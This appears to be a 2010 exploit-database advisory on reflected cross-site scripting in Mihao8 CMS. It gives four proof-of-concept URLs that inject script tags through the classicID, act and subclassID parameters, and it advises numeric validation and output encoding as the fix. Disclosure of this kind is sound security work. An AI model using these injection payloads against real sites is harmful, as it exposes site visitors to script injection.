# Exploit Title: Mihao8 CMS Multiple XSS Vulnerabilities
# Date: 2010-4-23
# Author: riusksk (quange)
# Tested on: [Windows 7]
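==========================================================
Mihao8 CMS Multiple XSS Vulnerabilities
==========================================================
# Summary: the query-string parameters classicID, act and subclassID of index.asp,
# and subclassID of ssb.asp, are echoed into the response without HTML encoding.
# Each proof-of-concept URL uses `">` to break out of what appears to be a quoted
# attribute, after which the injected markup is parsed by the browser.
# These parameters carry numeric IDs in every URL shown, so rejecting non-numeric
# values server-side and HTML-encoding the value on output both address the issue.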
# Exploit Code:
=========================== 0x1 ===========================
# Injection point: classicID parameter of index.asp
http://www.mihao8.com/index.asp?ForumID=2&subclassID=1&act=1&classicID=1>"><script>alert("riusksk")</script>&page=1
=========================== 0x3 ===========================
# Injection point: act parameter of index.asp
http://www.mihao8.com/index.asp?ForumID=2&subclassID=1&act=1>"><script>alert("riusksk")</script>&classicID=1&page=1
=========================== 0x4 ===========================
# Injection point: subclassID parameter of index.asp
http://www.mihao8.com/index.asp?ForumID=2&subclassID=1>"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
=========================== 0x5 ===========================
# Injection point: subclassID parameter of ssb.asp
http://www.mihao8.com/ssb.asp?ForumID=1&subclassID=1>"><script>alert("riusksk")</script>&act=1&classicID=1&page=1
========================================================== ================= EOF ==================================== ========================================================